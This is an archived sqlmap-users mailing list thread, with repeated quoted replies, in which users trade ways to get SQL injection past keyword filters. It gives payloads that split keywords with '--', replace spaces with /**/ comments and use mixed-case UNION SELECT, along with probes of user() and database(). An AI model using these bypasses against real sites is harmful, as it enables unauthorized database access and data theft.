Thread: [sqlmap-users] How to avoid union filter?

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

hello

is there anyway to avoid server filter ? like filtering union or select 
in the URL?

coz sqlmap seems doesnt work when there is a filtering

thankx

hello

is there anyway to avoid server filter ? like filtering union or select 
in the URL?

coz sqlmap seems doesnt work when there is a filtering

thankx

What type of filter is used? It removes certain words and executes the
query, or simply does not run anything at all?

I've came across a filter that removed certain words of parameters passed by
users, such as UNION, SELECT, DROP, ALTER, UPDATE, and comments like "--" or
"/*".

To get around, I used this:

http://www.site.com/vuln.php?id=323 UN--ION A--LL SELE--CT 1,2,3 FRO--M
table

The query was filtered 1x and resulted in the following expression:

http://www.site.com/vuln.php?id=323 UNION ALL SELECT 1,2,3 FROM table

Hope this help. =)

On Thu, Apr 22, 2010 at 2:01 PM, Pagera <pag...@gm...> wrote:

> hello
>
> is there anyway to avoid server filter ? like filtering union or select
> in the URL?
>
> coz sqlmap seems doesnt work when there is a filtering
>
> thankx
>
>
> ------------------------------------------------------------------------------
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

-- 
David Gomes Guimarães

Some times you can bypass some bad implemented IDS/WAF who looks for
specific words like "union", "select" or "from" like David sais in other
ways, for example:
http://www.site.com/vuln.php?id=323/**/union/**/all/**/select/**/...
(replacing spaces by /**/)
or:
http://www.site.com/vuln.php?id=323 UnIoN aLl SeLeCt... (randomly
uppercase/lowercase key words, some ids/waf only looks for "union" or
"UNION" but not for "UnIoN")

Also i think the sqlmap developpers are working on more sophisticated bypass
techniques.

2010/4/22 David Guimaraes <sk...@gm...>

> What type of filter is used? It removes certain words and executes the
> query, or simply does not run anything at all?
>
> I've came across a filter that removed certain words of parameters passed
> by users, such as UNION, SELECT, DROP, ALTER, UPDATE, and comments like "--"
> or "/*".
>
> To get around, I used this:
>
> http://www.site.com/vuln.php?id=323 UN--ION A--LL SELE--CT 1,2,3 FRO--M
> table
>
> The query was filtered 1x and resulted in the following expression:
>
> http://www.site.com/vuln.php?id=323 UNION ALL SELECT 1,2,3 FROM table
>
>
> Hope this help. =)
>
>
> On Thu, Apr 22, 2010 at 2:01 PM, Pagera <pag...@gm...> wrote:
>
>> hello
>>
>> is there anyway to avoid server filter ? like filtering union or select
>> in the URL?
>>
>> coz sqlmap seems doesnt work when there is a filtering
>>
>> thankx
>>
>>
>> ------------------------------------------------------------------------------
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> David Gomes Guimarães
>
>
> ------------------------------------------------------------------------------
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

hello
type of filter is:
the server is filtering for something like
information_schema.tables its filtered
@@version() is filtered but version() is not
user() is not filtered i could get the user name and the db name
database() is not filtered

select is filtered but i could bypass it by puting the comment /**/ before
and after select and it  work
but i couldnt get the table names cuz of filtering information_schema.tables

i couldnt recognize how this filter works

so is there any way to bypass something like information_schema.tables
i used CHAR() like
CHAR(69,6e,66,6f,72,6d,61,74,69,6f,6e,5f,73,63,68,65,6d,61,2e,74,61,62,6c,65,73)
but it didnt work too

2010/4/22 Ignacio Hernández <nac...@gm...>

> Some times you can bypass some bad implemented IDS/WAF who looks for
> specific words like "union", "select" or "from" like David sais in other
> ways, for example:
> http://www.site.com/vuln.php?id=323/**/union/**/all/**/select/**/...
> (replacing spaces by /**/)
> or:
> http://www.site.com/vuln.php?id=323 UnIoN aLl SeLeCt... (randomly
> uppercase/lowercase key words, some ids/waf only looks for "union" or
> "UNION" but not for "UnIoN")
>
> Also i think the sqlmap developpers are working on more sophisticated
> bypass techniques.
>
> 2010/4/22 David Guimaraes <sk...@gm...>
>
> What type of filter is used? It removes certain words and executes the
>> query, or simply does not run anything at all?
>>
>> I've came across a filter that removed certain words of parameters passed
>> by users, such as UNION, SELECT, DROP, ALTER, UPDATE, and comments like "--"
>> or "/*".
>>
>> To get around, I used this:
>>
>> http://www.site.com/vuln.php?id=323 UN--ION A--LL SELE--CT 1,2,3 FRO--M
>> table
>>
>> The query was filtered 1x and resulted in the following expression:
>>
>> http://www.site.com/vuln.php?id=323 UNION ALL SELECT 1,2,3 FROM table
>>
>>
>> Hope this help. =)
>>
>>
>> On Thu, Apr 22, 2010 at 2:01 PM, Pagera <pag...@gm...> wrote:
>>
>>> hello
>>>
>>> is there anyway to avoid server filter ? like filtering union or select
>>> in the URL?
>>>
>>> coz sqlmap seems doesnt work when there is a filtering
>>>
>>> thankx
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>
>>
>>
>> --
>> David Gomes Guimarães
>>
>>
>> ------------------------------------------------------------------------------
>>
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>